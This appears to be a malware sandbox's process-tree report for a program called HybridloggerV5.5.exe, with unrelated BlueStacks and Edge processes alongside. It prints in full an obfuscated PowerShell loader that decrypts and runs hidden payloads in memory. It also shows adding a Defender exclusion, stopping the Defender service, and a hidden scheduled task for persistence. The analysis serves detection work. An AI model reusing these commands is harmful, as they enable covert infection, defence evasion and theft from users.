    "C:\Windows\system32\whoami.exe" /groups
    3⤵
    PID:4072
- - C:\Windows\system32\net1.exe
    "C:\Windows\system32\net1.exe" stop windefend
    3⤵
    PID:4888
- - C:\Windows\system32\sc.exe
    "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
    3⤵
    - Launches sc.exe
    PID:1884

C:\Users\Admin\AppData\Local\Temp\BlueStacksInstaller_5.21.550.1031_native_a84df0a742c64361a047a75521553ed5_MDs1LDM7MTUsMTsxNSw0OzE1LA==.exe
"C:\Users\Admin\AppData\Local\Temp\BlueStacksInstaller_5.21.550.1031_native_a84df0a742c64361a047a75521553ed5_MDs1LDM7MTUsMTsxNSw0OzE1LA==.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2552
- C:\Users\Admin\AppData\Local\Temp\7zS8F9FD887\BlueStacksInstaller.exe
  "C:\Users\Admin\AppData\Local\Temp\7zS8F9FD887\BlueStacksInstaller.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3132
- - C:\Users\Admin\AppData\Local\Temp\7zS8F9FD887\HD-CheckCpu.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS8F9FD887\HD-CheckCpu.exe" --cmd checkHypervEnabled
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2928
- - C:\Users\Admin\AppData\Local\Temp\7zS8F9FD887\HD-CheckCpu.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS8F9FD887\HD-CheckCpu.exe" --cmd checkSSE4
    3⤵
    - Executes dropped EXE
    PID:5060

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa49bd3cb8,0x7ffa49bd3cc8,0x7ffa49bd3cd8
  2⤵
  PID:4424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1924 /prefetch:2
  2⤵
  PID:1444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2564 /prefetch:8
  2⤵
  PID:4216
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
  2⤵
  PID:3432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
  2⤵
  PID:1252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4048 /prefetch:1
  2⤵
  PID:2284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:1
  2⤵
  PID:4692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3484 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3840 /prefetch:1
  2⤵
  PID:1596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:1
  2⤵
  PID:3844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3552 /prefetch:1
  2⤵
  PID:4740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
  2⤵
  PID:3060
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5372 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1
  2⤵
  PID:1252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4724 /prefetch:8
  2⤵
  PID:2364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5284 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:2296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:1
  2⤵
  PID:3064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5284 /prefetch:1
  2⤵
  PID:616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1
  2⤵
  PID:4764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
  2⤵
  PID:3128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1732 /prefetch:1
  2⤵
  PID:988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
  2⤵
  PID:676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5848 /prefetch:8
  2⤵
  PID:2240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6556 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3656
- C:\Users\Admin\Downloads\HybridloggerV5.5.exe
  "C:\Users\Admin\Downloads\HybridloggerV5.5.exe"
  2⤵
  - Executes dropped EXE
  PID:4792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HybridLoggerFixed.bat" "
    3⤵
    PID:1932
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:2640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat" "
    3⤵
    PID:2432
  - - C:\Windows\system32\net.exe
      net file
      4⤵
      PID:2388
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        5⤵
        
        PID:4080
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      4⤵
      Command and Scripting Interpreter: PowerShell
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1552
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_726_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_726.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2360
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_726.vbs"
        5⤵
        
        PID:2708
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_726.bat" "
        6⤵
        
        PID:4808
        
        C:\Windows\system32\net.exe
        
        net file
        7⤵
        
        PID:3988
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        8⤵
        
        PID:1476
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\AppData\Roaming\startup_str_726.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:1400
        
        C:\Windows\system32\sc.exe
        
        "C:\Windows\system32\sc.exe" qc windefend
        8⤵
        Launches sc.exe
        
        PID:1188
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
        8⤵
        
        PID:3684
        
        C:\Windows\system32\whoami.exe
        
        "C:\Windows\system32\whoami.exe" /groups
        8⤵
        
        PID:4568
        
        C:\Windows\system32\net1.exe
        
        "C:\Windows\system32\net1.exe" start TrustedInstaller
        8⤵
        
        PID:1996
        
        C:\Windows\system32\net1.exe
        
        "C:\Windows\system32\net1.exe" start lsass
        8⤵
        
        PID:4764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6508 /prefetch:2
  2⤵
  PID:4572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4924 /prefetch:1
  2⤵
  PID:4656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1716 /prefetch:1
  2⤵
  PID:2996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1372 /prefetch:1
  2⤵
  PID:1272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:1
  2⤵
  PID:3436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6536 /prefetch:1
  2⤵
  PID:3880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4748 /prefetch:1
  2⤵
  PID:4360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6952 /prefetch:1
  2⤵
  PID:2612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6868 /prefetch:1
  2⤵
  PID:1884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:1
  2⤵
  PID:420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7128 /prefetch:8
  2⤵
  PID:3704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:1
  2⤵
  PID:3844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4748 /prefetch:1
  2⤵
  PID:4740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7052 /prefetch:1
  2⤵
  PID:5948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1920,15313168367727732990,8630806290823738640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5612 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  PID:5132

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:688

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1992

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004CC 0x00000000000004E4
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1244

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4164

C:\Users\Admin\Downloads\HybridloggerV5.5.exe
"C:\Users\Admin\Downloads\HybridloggerV5.5.exe"
1⤵
- Executes dropped EXE
PID:3708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HybridLoggerFixed.bat" "
